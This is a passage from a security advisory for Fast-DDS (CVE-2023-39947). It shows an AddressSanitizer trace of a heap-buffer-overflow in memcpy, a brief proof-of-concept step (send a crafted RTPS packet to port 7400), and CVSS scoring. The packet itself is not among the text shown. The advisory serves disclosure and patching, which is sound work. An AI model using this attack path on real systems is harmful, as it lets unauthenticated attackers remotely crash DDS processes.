    #2 0x7f2e012c1ed9 in eprosima::fastdds::rtps::UDPChannelResource::UDPChannelResource(eprosima::fastdds::rtps::UDPTransportInterface*, asio::basic_datagram_socket<asio::ip::udp>&, unsigned int, eprosima::fastrtps::rtps::Locator_t const&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastdds::rtps::TransportReceiverInterface*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/transport/UDPChannelResource.cpp:42:17
    #3 0x7f2e0131a8d2 in eprosima::fastdds::rtps::UDPTransportInterface::CreateInputChannelResource(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, eprosima::fastrtps::rtps::Locator_t const&, bool, unsigned int, eprosima::fastdds::rtps::TransportReceiverInterface*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/transport/UDPTransportInterface.cpp:234:41
    #4 0x7f2e0131a53c in eprosima::fastdds::rtps::UDPTransportInterface::OpenAndBindInputSockets(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastdds::rtps::TransportReceiverInterface*, bool, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/transport/UDPTransportInterface.cpp:207:60
    #5 0x7f2e012ead04 in eprosima::fastdds::rtps::UDPv4Transport::OpenInputChannel(eprosima::fastrtps::rtps::Locator_t const&, eprosima::fastdds::rtps::TransportReceiverInterface*, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/transport/UDPv4Transport.cpp:327:42
    #6 0x7f2e01171368 in eprosima::fastrtps::rtps::ReceiverResource::ReceiverResource(eprosima::fastdds::rtps::TransportInterface&, eprosima::fastrtps::rtps::Locator_t const&, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/network/ReceiverResource.cpp:43:40
    #7 0x7f2e01169b73 in eprosima::fastrtps::rtps::NetworkFactory::BuildReceiverResources(eprosima::fastrtps::rtps::Locator_t&, std::vector<std::shared_ptr<eprosima::fastrtps::rtps::ReceiverResource>, std::allocator<std::shared_ptr<eprosima::fastrtps::rtps::ReceiverResource> > >&, unsigned int) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/network/NetworkFactory.cpp:74:81
    #8 0x7f2e0117a526 in eprosima::fastrtps::rtps::RTPSParticipantImpl::createReceiverResources(eprosima::fastdds::rtps::LocatorList&, bool, bool) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/participant/RTPSParticipantImpl.cpp:1680:60
    #9 0x7f2e01175fd2 in eprosima::fastrtps::rtps::RTPSParticipantImpl::RTPSParticipantImpl(unsigned int, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::GuidPrefix_t const&, eprosima::fastrtps::rtps::GuidPrefix_t const&, eprosima::fastrtps::rtps::RTPSParticipant*, eprosima::fastrtps::rtps::RTPSParticipantListener*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/participant/RTPSParticipantImpl.cpp:355:28
    #10 0x7f2e01176bd8 in eprosima::fastrtps::rtps::RTPSParticipantImpl::RTPSParticipantImpl(unsigned int, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::GuidPrefix_t const&, eprosima::fastrtps::rtps::RTPSParticipant*, eprosima::fastrtps::rtps::RTPSParticipantListener*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/participant/RTPSParticipantImpl.cpp:449:87
    #11 0x7f2e01196fa8 in eprosima::fastrtps::rtps::RTPSDomainImpl::createParticipant(unsigned int, bool, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::RTPSParticipantListener*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/RTPSDomain.cpp:216:76
    #12 0x7f2e011961d5 in eprosima::fastrtps::rtps::RTPSDomain::createParticipant(unsigned int, bool, eprosima::fastrtps::rtps::RTPSParticipantAttributes const&, eprosima::fastrtps::rtps::RTPSParticipantListener*) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/rtps/RTPSDomain.cpp:88:45
    #13 0x7f2e0127add3 in eprosima::fastdds::dds::DomainParticipantImpl::enable() /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/domain/DomainParticipantImpl.cpp:269:45
    #14 0x7f2e012a08e5 in eprosima::fastdds::dds::DomainParticipant::enable() /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/domain/DomainParticipant.cpp:110:43
    #15 0x7f2e0126e9d9 in eprosima::fastdds::dds::DomainParticipantFactory::create_participant(unsigned int, eprosima::fastdds::dds::DomainParticipantQos const&, eprosima::fastdds::dds::DomainParticipantListener*, eprosima::fastdds::dds::StatusMask const&) /home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/src/cpp/fastdds/domain/DomainParticipantFactory.cpp:187:58
    #16 0x557885 in HelloWorldSubscriber::init() (/home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x557885)
    #17 0x564840 in main (/home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x564840)
    #18 0x7f2dffd39082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16

SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/seulbae/ddssecurity/targets/fastdds-2.9.1-hotfix/src/fastrtps/examples/cpp/dds/HelloWorld/DDSSecureHelloWorldExample+0x474522) in memcpy
Shadow bytes around the buggy address:
  0x0c047fffebb0: fa fa 00 fa fa fa 00 fa fa fa 00 fa fa fa 00 fa
  0x0c047fffebc0: fa fa 00 fa fa fa fd fa fa fa 00 fa fa fa 00 fa
  0x0c047fffebd0: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fd
  0x0c047fffebe0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa 00 fa
  0x0c047fffebf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fffec00: fa fa 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fffec10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fffec20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fffec30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fffec40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fffec50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc

PoC

Run any fastdds process on domain 0.
Send the RTPS packet above to 127.0.0.1:7400.

Impact

This can remotely crash any Fast-DDS process.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

CVE ID

CVE-2023-39947

Weaknesses

Credits